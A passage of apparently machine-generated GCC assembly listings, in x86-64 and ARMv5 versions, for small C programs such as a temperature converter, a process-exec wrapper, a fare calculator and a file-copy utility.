.note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "465648.c" .text .section .rodata .align 2 .LC0: .ascii "\012\0121. F to C\0122. C to F\000" .align 2 .LC1: .ascii "\012\012Enter your choice : \000" .align 2 .LC2: .ascii "%d\000" .align 2 .LC3: .ascii "\012\012Enter the value : \000" .align 2 .LC4: .ascii "%f\000" .global __aeabi_fsub .global __aeabi_f2d .global __aeabi_ddiv .global __aeabi_d2f .global __aeabi_dmul .global __aeabi_dadd .align 2 .LC5: .ascii "\012Invalid Choice!\012\012\000" .align 2 .LC6: .ascii "\012Answer is %f\012\012\000" .align 2 .LC7: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 ldr r3, .L8 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 ldr r0, .L8+4 bl printf ldr r0, .L8+8 bl printf sub r3, fp, #20 mov r1, r3 ldr r0, .L8+12 bl __isoc99_scanf ldr r3, [fp, #-20] cmp r3, #1 bne .L2 ldr r0, .L8+16 bl printf sub r3, fp, #16 mov r1, r3 ldr r0, .L8+20 bl __isoc99_scanf ldr r3, [fp, #-16] @ float mov r1, #1107296256 mov r0, r3 bl __aeabi_fsub mov r3, r0 mov r0, r3 bl __aeabi_f2d ldr r2, .L8+24 ldr r3, .L8+28 bl __aeabi_ddiv mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r3, r0 str r3, [fp, #-12] @ float b .L3 .L2: ldr r3, [fp, #-20] cmp r3, #2 bne .L4 ldr r0, .L8+16 bl printf sub r3, fp, #16 mov r1, r3 ldr r0, .L8+20 bl __isoc99_scanf ldr r3, [fp, #-16] @ float mov r0, r3 bl __aeabi_f2d ldr r2, .L8+24 ldr r3, .L8+28 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 mov r2, #0 ldr r3, .L8+32 bl __aeabi_dadd mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r3, r0 str r3, [fp, #-12] @ float b .L3 .L4: ldr r0, .L8+36 bl printf mov r3, r0 b .L6 .L3: ldr r0, [fp, #-12] @ float bl __aeabi_f2d mov r2, r0 mov r3, r1 ldr r0, .L8+40 bl printf mov r3, #0 .L6: ldr r2, .L8 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L7 bl __stack_chk_fail .L7: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L9: .align 2 .L8: .word .LC7 .word .LC0 .word .LC1 .word .LC2 .word .LC3 .word .LC4 .word -858993459 .word 1073532108 .word 1077936128 .word .LC5 .word .LC6 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "244670.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "forking" .align 8 .LC1: .string "%s exited with non-zero code %i" .LC2: .string "%s killed by signal %s" .LC3: .string "executing %s" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov DWORD PTR -36[rbp], edi mov QWORD PTR -48[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax add QWORD PTR -48[rbp], 8 mov rax, QWORD PTR -48[rbp] mov rax, QWORD PTR [rax] mov esi, 47 mov rdi, rax call strrchr@PLT mov QWORD PTR -16[rbp], rax cmp QWORD PTR -16[rbp], 0 jne .L2 mov rax, QWORD PTR -48[rbp] mov rax, QWORD PTR [rax] mov QWORD PTR -16[rbp], rax jmp .L3 .L2: add QWORD PTR -16[rbp], 1 .L3: call vfork@PLT endbr64 cmp eax, -1 je .L4 test eax, eax je .L5 jmp .L13 .L4: lea rsi, .LC0[rip] mov edi, 1 mov eax, 0 call err@PLT .L5: mov rax, QWORD PTR -48[rbp] mov rax, QWORD PTR [rax] mov rcx, QWORD PTR -16[rbp] mov edx, 0 mov rsi, rcx mov rdi, rax mov eax, 0 call execl@PLT mov edi, 212 call _exit@PLT .L13: nop .L7: lea rax, -28[rbp] mov rdi, rax call wait@PLT cmp eax, -1 je .L7 mov eax, DWORD PTR -28[rbp] and eax, 127 test eax, eax jne .L8 mov eax, DWORD PTR -28[rbp] sar eax, 8 and eax, 255 mov DWORD PTR -20[rbp], eax cmp DWORD PTR -20[rbp], 0 je .L9 mov ecx, DWORD PTR -20[rbp] mov rdx, QWORD PTR -16[rbp] mov eax, DWORD PTR -20[rbp] lea rsi, .LC1[rip] mov edi, eax mov eax, 0 call errx@PLT .L8: mov eax, DWORD PTR -28[rbp] and eax, 127 mov DWORD PTR -24[rbp], eax mov eax, DWORD PTR -24[rbp] mov edi, eax call strsignal@PLT mov rcx, rax mov rax, QWORD PTR stderr[rip] mov rdx, QWORD PTR -16[rbp] lea rsi, .LC2[rip] mov rdi, rax mov eax, 0 call fprintf@PLT call getpid@PLT mov edx, eax mov eax, DWORD PTR -24[rbp] mov esi, eax mov edi, edx call kill@PLT .L9: add QWORD PTR -48[rbp], 8 mov rax, QWORD PTR -48[rbp] mov rax, QWORD PTR [rax] mov esi, 47 mov rdi, rax call strrchr@PLT mov QWORD PTR -16[rbp], rax cmp QWORD PTR -16[rbp], 0 jne .L10 mov rax, QWORD PTR -48[rbp] mov rax, QWORD PTR [rax] mov QWORD PTR -16[rbp], rax jmp .L11 .L10: add QWORD PTR -16[rbp], 1 .L11: mov rax, QWORD PTR -48[rbp] mov rax, QWORD PTR [rax] mov rcx, QWORD PTR -16[rbp] mov edx, 0 mov rsi, rcx mov rdi, rax mov eax, 0 call execl@PLT mov rax, QWORD PTR -16[rbp] mov rdx, rax lea rsi, .LC3[rip] mov edi, 212 mov eax, 0 call err@PLT .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "244670.c" .text .section .rodata .align 2 .LC0: .ascii "forking\000" .align 2 .LC1: .ascii "%s exited with non-zero code %i\000" .align 2 .LC2: .ascii "%s killed by signal %s\000" .align 2 .LC3: .ascii "executing %s\000" .align 2 .LC4: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 32 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #36 str r0, [fp, #-40] str r1, [fp, #-44] ldr r3, .L14 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 ldr r3, [fp, #-44] add r3, r3, #4 str r3, [fp, #-44] ldr r3, [fp, #-44] ldr r3, [r3] mov r1, #47 mov r0, r3 bl strrchr str r0, [fp, #-28] ldr r3, [fp, #-28] cmp r3, #0 bne .L2 ldr r3, [fp, #-44] ldr r3, [r3] str r3, [fp, #-28] b .L3 .L2: ldr r3, [fp, #-28] add r3, r3, #1 str r3, [fp, #-28] .L3: bl vfork mov r3, r0 cmn r3, #1 beq .L4 cmp r3, #0 beq .L5 b .L13 .L4: ldr r1, .L14+4 mov r0, #1 bl err .L5: ldr r3, [fp, #-44] ldr r3, [r3] mov r2, #0 ldr r1, [fp, #-28] mov r0, r3 bl execl mov r0, #212 bl _exit .L13: nop .L7: sub r3, fp, #32 mov r0, r3 bl wait mov r3, r0 cmn r3, #1 beq .L7 ldr r3, [fp, #-32] and r3, r3, #127 cmp r3, #0 bne .L8 ldr r3, [fp, #-32] asr r3, r3, #8 and r3, r3, #255 str r3, [fp, #-20] ldr r3, [fp, #-20] cmp r3, #0 beq .L9 ldr r3, [fp, #-20] ldr r2, [fp, #-28] ldr r1, .L14+8 ldr r0, [fp, #-20] bl errx .L8: ldr r3, [fp, #-32] and r3, r3, #127 str r3, [fp, #-24] ldr r3, .L14+12 ldr r4, [r3] ldr r0, [fp, #-24] bl strsignal mov r3, r0 ldr r2, [fp, #-28] ldr r1, .L14+16 mov r0, r4 bl fprintf bl getpid mov r3, r0 ldr r1, [fp, #-24] mov r0, r3 bl kill .L9: ldr r3, [fp, #-44] add r3, r3, #4 str r3, [fp, #-44] ldr r3, [fp, #-44] ldr r3, [r3] mov r1, #47 mov r0, r3 bl strrchr str r0, [fp, #-28] ldr r3, [fp, #-28] cmp r3, #0 bne .L10 ldr r3, [fp, #-44] ldr r3, [r3] str r3, [fp, #-28] b .L11 .L10: ldr r3, [fp, #-28] add r3, r3, #1 str r3, [fp, #-28] .L11: ldr r3, [fp, #-44] ldr r3, [r3] mov r2, #0 ldr r1, [fp, #-28] mov r0, r3 bl execl ldr r2, [fp, #-28] ldr r1, .L14+20 mov r0, #212 bl err .L15: .align 2 .L14: .word .LC4 .word .LC0 .word .LC1 .word stderr .word .LC2 .word .LC3 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "149552.c" .intel_syntax noprefix .text .globl run_strcmp .type run_strcmp, @function run_strcmp: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov QWORD PTR -32[rbp], rsi mov rdx, QWORD PTR -32[rbp] mov rax, QWORD PTR -24[rbp] mov rsi, rdx mov rdi, rax call strcmp@PLT mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR -4[rbp] cdqe leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size run_strcmp, .-run_strcmp .globl wasm_fault .type wasm_fault, @function wasm_fault: .LFB1: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -8[rbp], -1 mov rax, QWORD PTR -8[rbp] mov BYTE PTR [rax], 120 nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE1: .size wasm_fault, .-wasm_fault .globl host_fault .type host_fault, @function host_fault: .LFB2: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 call hostcall_host_fault@PLT nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE2: .size host_fault, .-host_fault .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "149552.c" .text .align 2 .global run_strcmp .syntax unified .arm .fpu softvfp .type run_strcmp, %function run_strcmp: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] str r1, [fp, #-20] ldr r1, [fp, #-20] ldr r0, [fp, #-16] bl strcmp str r0, [fp, #-8] ldr r3, [fp, #-8] mov r2, r3 asr r3, r2, #31 mov r0, r2 mov r1, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size run_strcmp, .-run_strcmp .align 2 .global wasm_fault .syntax unified .arm .fpu softvfp .type wasm_fault, %function wasm_fault: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 mvn r3, #0 str r3, [fp, #-8] ldr r3, [fp, #-8] mov r2, #120 strb r2, [r3] nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size wasm_fault, .-wasm_fault .align 2 .global host_fault .syntax unified .arm .fpu softvfp .type host_fault, %function host_fault: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 bl hostcall_host_fault nop pop {fp, pc} .size host_fault, .-host_fault .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "383557.c" .intel_syntax noprefix .text .section .rodata .align 8 .LC0: .string "Enter the Distance the van has travelled : " .LC1: .string "%d" .LC2: .string "Total Amount %.2f" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT lea rax, -16[rbp] mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT mov eax, DWORD PTR -16[rbp] cmp eax, 29 jg .L2 mov eax, DWORD PTR -16[rbp] imul eax, eax, 50 pxor xmm0, xmm0 cvtsi2ss xmm0, eax movss DWORD PTR -12[rbp], xmm0 jmp .L3 .L2: mov eax, DWORD PTR -16[rbp] cmp eax, 30 jle .L3 mov eax, DWORD PTR -16[rbp] lea edx, -30[rax] mov eax, edx sal eax, 2 add eax, edx sal eax, 3 add eax, 1500 pxor xmm0, xmm0 cvtsi2ss xmm0, eax movss DWORD PTR -12[rbp], xmm0 .L3: pxor xmm1, xmm1 cvtss2sd xmm1, DWORD PTR -12[rbp] movq rax, xmm1 movq xmm0, rax lea rdi, .LC2[rip] mov eax, 1 call printf@PLT mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L5 call __stack_chk_fail@PLT .L5: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "383557.c" .text .section .rodata .align 2 .LC0: .ascii "Enter the Distance the van has travelled : \000" .align 2 .LC1: .ascii "%d\000" .global __aeabi_i2f .global __aeabi_f2d .align 2 .LC2: .ascii "Total Amount %.2f\000" .align 2 .LC3: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 ldr r3, .L6 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 ldr r0, .L6+4 bl printf sub r3, fp, #16 mov r1, r3 ldr r0, .L6+8 bl __isoc99_scanf ldr r3, [fp, #-16] cmp r3, #29 bgt .L2 ldr r2, [fp, #-16] mov r3, r2 lsl r3, r3, #2 add r3, r3, r2 lsl r2, r3, #2 add r3, r3, r2 lsl r3, r3, #1 mov r0, r3 bl __aeabi_i2f mov r3, r0 str r3, [fp, #-12] @ float b .L3 .L2: ldr r3, [fp, #-16] cmp r3, #30 ble .L3 ldr r3, [fp, #-16] sub r2, r3, #30 mov r3, r2 lsl r3, r3, #2 add r3, r3, r2 lsl r3, r3, #3 add r3, r3, #1488 add r3, r3, #12 mov r0, r3 bl __aeabi_i2f mov r3, r0 str r3, [fp, #-12] @ float .L3: ldr r0, [fp, #-12] @ float bl __aeabi_f2d mov r2, r0 mov r3, r1 ldr r0, .L6+12 bl printf mov r3, #0 ldr r2, .L6 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L5 bl __stack_chk_fail .L5: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L7: .align 2 .L6: .word .LC3 .word .LC0 .word .LC1 .word .LC2 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "104505.c" .intel_syntax noprefix .text .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "104505.c" .text .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "492098.c" .intel_syntax noprefix .text .globl buf .bss .align 32 .type buf, @object .size buf, 10240 buf: .zero 10240 .section .rodata .LC0: .string "%s\n" .text .globl fatal .type fatal, @function fatal: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov rax, QWORD PTR stderr[rip] mov rdx, QWORD PTR -8[rbp] lea rsi, .LC0[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov edi, 1 call exit@PLT .cfi_endproc .LFE0: .size fatal, .-fatal .section .rodata .align 8 .LC1: .string "Usage: open source destination" .LC2: .string "cannot open input file" .LC3: .string "cannot open output file" .LC4: .string "read error" .LC5: .string "write error" .LC6: .string "cannot close" .text .globl main .type main, @function main: .LFB1: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 push r13 push r12 push rbx sub rsp, 24 .cfi_offset 13, -24 .cfi_offset 12, -32 .cfi_offset 3, -40 mov DWORD PTR -36[rbp], edi mov QWORD PTR -48[rbp], rsi cmp DWORD PTR -36[rbp], 3 je .L3 lea rdi, .LC1[rip] mov eax, 0 call fatal .L3: mov rax, QWORD PTR -48[rbp] add rax, 8 mov rax, QWORD PTR [rax] mov esi, 0 mov rdi, rax mov eax, 0 call open@PLT mov r13d, eax cmp r13d, -1 jne .L4 lea rdi, .LC2[rip] mov eax, 0 call fatal .L4: mov rax, QWORD PTR -48[rbp] add rax, 16 mov rax, QWORD PTR [rax] mov esi, 0 mov rdi, rax mov eax, 0 call creat@PLT mov r12d, eax cmp r12d, -1 jne .L6 lea rdi, .LC3[rip] mov eax, 0 call fatal jmp .L6 .L8: cmp ebx, -1 jne .L7 lea rdi, .LC4[rip] mov eax, 0 call fatal .L7: mov edx, ebx lea rsi, buf[rip] mov edi, r12d mov eax, 0 call write@PLT cmp ebx, eax je .L6 lea rdi, .LC5[rip] mov eax, 0 call fatal .L6: mov edx, 10240 lea rsi, buf[rip] mov edi, r13d mov eax, 0 call read@PLT mov ebx, eax test ebx, ebx jne .L8 mov edi, r13d mov eax, 0 call close@PLT cmp eax, -1 je .L9 mov edi, r12d mov eax, 0 call close@PLT cmp eax, -1 jne .L10 .L9: lea rdi, .LC6[rip] mov eax, 0 call fatal .L10: mov edi, 0 call exit@PLT .cfi_endproc .LFE1: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "492098.c" .text .comm buf,10240,4 .section .rodata .align 2 .LC0: .ascii "%s\012\000" .text .align 2 .global fatal .syntax unified .arm .fpu softvfp .type fatal, %function fatal: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] ldr r3, .L2 ldr r3, [r3] ldr r2, [fp, #-8] ldr r1, .L2+4 mov r0, r3 bl fprintf mov r0, #1 bl exit .L3: .align 2 .L2: .word stderr .word .LC0 .size fatal, .-fatal .section .rodata .align 2 .LC1: .ascii "Usage: open source destination\000" .align 2 .LC2: .ascii "cannot open input file\000" .align 2 .LC3: .ascii "cannot open output file\000" .align 2 .LC4: .ascii "read error\000" .align 2 .LC5: .ascii "write error\000" .align 2 .LC6: .ascii "cannot close\000" .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, fp, lr} add fp, sp, #16 sub sp, sp, #12 str r0, [fp, #-24] str r1, [fp, #-28] ldr r3, [fp, #-24] cmp r3, #3 beq .L5 ldr r0, .L13 bl fatal .L5: ldr r3, [fp, #-28] add r3, r3, #4 ldr r3, [r3] mov r1, #0 mov r0, r3 bl open mov r6, r0 cmn r6, #1 bne .L6 ldr r0, .L13+4 bl fatal .L6: ldr r3, [fp, #-28] add r3, r3, #8 ldr r3, [r3] mov r1, #0 mov r0, r3 bl creat mov r5, r0 cmn r5, #1 bne .L8 ldr r0, .L13+8 bl fatal b .L8 .L10: cmn r4, #1 bne .L9 ldr r0, .L13+12 bl fatal .L9: mov r2, r4 ldr r1, .L13+16 mov r0, r5 bl write mov r3, r0 cmp r4, r3 beq .L8 ldr r0, .L13+20 bl fatal .L8: mov r2, #10240 ldr r1, .L13+16 mov r0, r6 bl read mov r3, r0 mov r4, r3 cmp r4, #0 bne .L10 mov r0, r6 bl close mov r3, r0 cmn r3, #1 beq .L11 mov r0, r5 bl close mov r3, r0 cmn r3, #1 bne .L12 .L11: ldr r0, .L13+24 bl fatal .L12: mov r0, #0 bl exit .L14: .align 2 .L13: .word .LC1 .word .LC2 .word .LC3 .word .LC4 .word buf .word .LC5 .word .LC6 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "275128.c" .intel_syntax noprefix .text .globl watchdog_periodic .type watchdog_periodic, @function watchdog_periodic: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size watchdog_periodic, .-watchdog_periodic .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "275128.c" .text .align 2 .global watchdog_periodic .syntax unified .arm .fpu softvfp .type watchdog_periodic, %function watchdog_periodic: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size watchdog_periodic, .-watchdog_periodic .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "85957.c" .intel_syntax noprefix .text .globl l .data .align 8 .type l, @object .size l, 8 l: .quad -9223372036854775808 .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "85957.c" .text .global l .data .align 3 .type l, %object .size l, 8 l: .word 0 .word -2147483648 .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "133319.c" .intel_syntax noprefix .text .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "133319.c" .text .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "265072.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "%d%d" .LC1: .string "%d" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov QWORD PTR -32[rbp], 0 mov QWORD PTR -24[rbp], 0 mov QWORD PTR -16[rbp], 0 lea rdx, -24[rbp] lea rax, -32[rbp] mov rsi, rax lea rdi, .LC0[rip] mov eax, 0 call __isoc99_scanf@PLT mov rax, QWORD PTR -24[rbp] pxor xmm0, xmm0 cvtsi2sd xmm0, rax mov rax, QWORD PTR -32[rbp] pxor xmm2, xmm2 cvtsi2sd xmm2, rax movq rax, xmm2 movapd xmm1, xmm0 movq xmm0, rax call pow@PLT cvttsd2si rax, xmm0 mov QWORD PTR -16[rbp], rax mov rax, QWORD PTR -16[rbp] mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call printf@PLT mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L3 call __stack_chk_fail@PLT .L3: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "265072.c" .text .section .rodata .align 2 .LC0: .ascii "%d%d\000" .global __aeabi_i2d .global __aeabi_d2iz .align 2 .LC1: .ascii "%d\000" .align 2 .LC2: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, fp, lr} add fp, sp, #12 sub sp, sp, #16 ldr r3, .L4 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 mov r3, #0 str r3, [fp, #-28] mov r3, #0 str r3, [fp, #-24] mov r3, #0 str r3, [fp, #-20] sub r2, fp, #24 sub r3, fp, #28 mov r1, r3 ldr r0, .L4+4 bl __isoc99_scanf ldr r3, [fp, #-28] mov r0, r3 bl __aeabi_i2d mov r4, r0 mov r5, r1 ldr r3, [fp, #-24] mov r0, r3 bl __aeabi_i2d mov r2, r0 mov r3, r1 mov r0, r4 mov r1, r5 bl pow mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2iz mov r3, r0 str 